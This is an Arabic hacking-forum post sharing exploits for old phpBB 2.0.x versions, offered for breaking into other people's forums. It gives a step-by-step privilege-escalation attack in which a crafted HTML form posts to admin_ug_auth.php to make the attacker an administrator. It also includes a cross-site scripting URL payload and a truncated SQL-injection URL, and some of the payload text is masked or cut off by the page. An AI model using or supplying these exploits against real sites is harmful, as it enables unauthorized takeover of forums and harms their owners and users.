ثغرة المطلوبه فى اغلب المنتديات التى لا يمكن اختراقهاphpbb

ثغرة المطلوبه فى اغلب المنتديات التى لا يمكن اختراقهاphpbb


النتائج 1 إلى 3 من 3

الموضوع: ثغرة المطلوبه فى اغلب المنتديات التى لا يمكن اختراقهاphpbb

مشاهدة المواضيع

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    Momayz ثغرة المطلوبه فى اغلب المنتديات التى لا يمكن اختراقهاphpbb

    السلام عليكم ورحمة الله وبركاته منقول
    ثغرة phpbb بجميع انواعها


    بعـــض طرق اختـــراق منتدى phpbb
    ثغرة خطيرة من منتدى من نوع
    PhpBB2
    في ملف admin_ug_auth.php
    الوصف:
    يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
    وبذلك يمكنك الدخول الى لوحة التحكم متى شئت

    الأصدار:

    2.0.0

    لتجربة الثغرة اولا سجل بالمنتدى
    ثم احفظ رقم عضويتك بالمنتدى
    بعدها افتح المفكرة وانسخ مايلي اليها

    كود PHP:
    <html>
    <head>
    </head>
    ******>

    <form method="post"
    action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
    User Level: <select name="userlevel">
    <option value="admin">Administrator</option>
    <option value="user">User</option></select>
    <input type="hidden" name="private[1]" value="0">
    <input type="hidden" name="moderator[1]" value="0">
    <input type="hidden" name="mode" value="user">
    <input type="hidden" name="adv" value="">
    User Number: <input type="text" name="u" size="5">
    <input type="submit" name="submit" value="Submit">

    </form>
    </body>
    </html>

    عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
    اخفظه بامتدادhtml
    عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
    قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
    ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
    أضغط زر submit
    بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك



    ::::::::
    ثغره فى الاصدار Powered by phpBB 2.0.6

    كل ما عليك تطبق الكود
    كود PHP:
    http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>********.write(********.******);</s cript>&category_rows[0][cat_order]=99
    ثغره فى الاصدار Powered by phpBB 2.0.9

    كل ما عليك هو تطبق هذا الكود

    كود PHP:
    http://www.xxxxx.com/privmsg.php?fo...20LIMI T%201
    تقبلوا تحياتى
    التعديل الأخير تم بواسطة فلاش الليل ; 12-06-2010 الساعة 04:28 PM
    هكر الجنوب

المواضيع المتشابهه

  1. سي دي عربي لتعليم احتراف الإختراق مرفق به البرامج المطلوبه
    بواسطة BLACK.JaGuAr في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 923
    آخر مشاركة: 08-13-2016, 11:32 PM
  2. الدرس الاول((مقدمه عن اللغه وبعض الادوات المطلوبه))*-*
    بواسطة ابو مشاري في المنتدى منتدى الإختراق العام
    مشاركات: 1
    آخر مشاركة: 01-14-2012, 05:38 PM
  3. [حل] تعقيب على الثغره السابق ذكرها vBulletin 3.8.6
    بواسطة shaggy10 في المنتدى قسم تطوير منتديات vb3.8.0
    مشاركات: 2
    آخر مشاركة: 09-21-2011, 10:48 PM
  4. برنامج اختراق المنتديات والمواقع..يجيب الثغره+الاستغلال+يعلق الاندكس
    بواسطة وردة السلام في المنتدى منتدى الإختراق العام
    مشاركات: 23
    آخر مشاركة: 03-22-2011, 05:09 PM
  5. ربط الثغره بالشل
    بواسطة Mays في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 08-18-2010, 09:39 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •